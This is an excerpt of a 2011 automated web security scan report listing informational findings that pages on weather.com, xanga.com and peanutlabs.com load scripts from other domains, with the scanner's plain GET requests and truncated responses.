Content-Type: text/html;charset=UTF-8
Content-Length: 168646
Date: Sun, 09 Jan 2011 01:44:02 GMT
X-Varnish: 736582048 736569742
Age: 11
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Hits: 22

<!DOCTYPE HTML>

<html lang="en">
<head>

<TITLE>National and Local Weath
...[SNIP]...
</style>

<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_2.js"></script>

<script type="text/javascript" src="http://s.imwx.com/v.20101206.171952/js/wx-a21-plugthis.js"></script>
...[SNIP]...

17.127. http://www.weather.com/weather/local/48617 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.weather.com
Path:	/weather/local/48617

Issue detail

The response dynamically includes the following scripts from other domains:

http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js
http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js

Request

GET /weather/local/48617 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.128. http://www.weather.com/weather/local/48858 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.weather.com
Path:	/weather/local/48858

Issue detail

The response dynamically includes the following scripts from other domains:

http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js
http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js

Request

GET /weather/local/48858 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.129. http://www.weather.com/weather/local/48879 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.weather.com
Path:	/weather/local/48879

Issue detail

The response dynamically includes the following scripts from other domains:

http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js
http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js

Request

GET /weather/local/48879 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.130. http://www.weather.com/weather/local/USMI0020 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.weather.com
Path:	/weather/local/USMI0020

Issue detail

The response dynamically includes the following scripts from other domains:

http://j.imwx.com/v.20100826.0/common/header/javascript/wx-header-events.js
http://s.imwx.com/js/2.8.0r4/yuiloader-dom-event/yuiloader-dom-event.js

Request

GET /weather/local/USMI0020 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.131. http://www.xanga.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xanga.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://edge.quantserve.com/quant.js
http://partner.googleadservices.com/gampad/google_service.js
http://www.google-analytics.com/ga.js

Request

GET / HTTP/1.1
Host: www.xanga.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: fp-promo-count=1:634325354543847909; expires=Sun, 06-Feb-2011 01:44:14 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 09 Jan 2011 01:44:13 GMT
Connection: close
Content-Length: 82140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

17.132. http://www1.peanutlabs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET / HTTP/1.1
Host: www1.peanutlabs.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:33:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 21857

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs </title>


<link
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.133. http://www1.peanutlabs.com/4-tips-to-better-monetize-social-games-with-offers/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/4-tips-to-better-monetize-social-games-with-offers/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /4-tips-to-better-monetize-social-games-with-offers/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:06:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Link: <http://www1.peanutlabs.com/?p=508>; rel=shortlink
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29752

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | 4 Tips to Better Monetize Social
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.134. http://www1.peanutlabs.com/author/admin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/author/admin/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /author/admin/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:06:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36954

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Peanut Labs</title>

<!-- STY
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.135. http://www1.peanutlabs.com/author/alex-dempsey/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/author/alex-dempsey/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /author/alex-dempsey/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:10:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22571

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Alex</title>

<!-- STYLESHEET
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.136. http://www1.peanutlabs.com/become-a-publisher/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/become-a-publisher/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /become-a-publisher/ HTTP/1.1
Host: www1.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www1.peanutlabs.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; __utmb=28928570.2.10.1294536852

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:35:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 18906

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Become a Publisher</title>

<
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.137. http://www1.peanutlabs.com/peanut-labs-acquired-by-e-rewards-silo-breaker/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/peanut-labs-acquired-by-e-rewards-silo-breaker/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /peanut-labs-acquired-by-e-rewards-silo-breaker/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:13:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Link: <http://www1.peanutlabs.com/?p=574>; rel=shortlink
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27493

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Peanut Labs Acquired by e-Rewards
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.138. http://www1.peanutlabs.com/peanut-labs-acquired-by-online-research-company-e-rewards-2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/peanut-labs-acquired-by-online-research-company-e-rewards-2/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /peanut-labs-acquired-by-online-research-company-e-rewards-2/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:06:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Link: <http://www1.peanutlabs.com/?p=568>; rel=shortlink
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29570

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Peanut Labs Acquired By E-Rewards
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.139. http://www1.peanutlabs.com/peanut-labs-inc-announces-acquisition-by-e-rrewards-inc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/peanut-labs-inc-announces-acquisition-by-e-rrewards-inc/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /peanut-labs-inc-announces-acquisition-by-e-rrewards-inc/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:06:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Link: <http://www1.peanutlabs.com/?p=588>; rel=shortlink
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28243

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Peanut Labs, Inc. Announces Acqui
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.140. http://www1.peanutlabs.com/social-networking-survey-startup-peanut-labs-sold-to-e-rewards-paidcontent/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/social-networking-survey-startup-peanut-labs-sold-to-e-rewards-paidcontent/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /social-networking-survey-startup-peanut-labs-sold-to-e-rewards-paidcontent/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:13:34 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Link: <http://www1.peanutlabs.com/?p=576>; rel=shortlink
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28472

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Social Networking Survey Startup
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.141. http://www1.peanutlabs.com/social-networking-survey-startup-peanut-labs-sold-to-e-rewards/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/social-networking-survey-startup-peanut-labs-sold-to-e-rewards/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /social-networking-survey-startup-peanut-labs-sold-to-e-rewards/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_email=test4%40fastdial.net; __utmz=28928570.1294536852.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=28928570.961439791.1294536852.1294536852.1294536852.1; __utmc=28928570; pl_lang=en_US; __utmb=28928570.3.10.1294536852;

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:13:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Link: <http://www1.peanutlabs.com/?p=570>; rel=shortlink
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28775

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Social Networking Survey Startup
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.142. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/wp-content/themes/showtime/sliders/scripts/slider_static3.js

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /wp-content/themes/showtime/sliders/scripts/slider_static3.js HTTP/1.1
Host: www1.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www1.peanutlabs.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6

Response

HTTP/1.1 404 Not Found
Date: Sun, 09 Jan 2011 01:34:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www1.peanutlabs.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 01:34:01 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 40853

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Peanut Labs | Page not found</title>

<!-- ST
...[SNIP]...
<link rel='stylesheet' id='wp-pagenavi-css' href='http://www1.peanutlabs.com/wp-content/themes/showtime/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1'></script>
...[SNIP]...
<div class="widget_footer_content"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

17.143. http://www1.peanutlabs.com/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/10/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www1.peanutlabs.com
Path:	/wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/10/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=3.0.1
http://widgets.twimg.com/j/2/widget.js

Request

GET /wp-content/themes/showtime/sliders/scripts/slider_static3.js/page/10/ HTTP/1.1
Host: www1.peanutlabs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
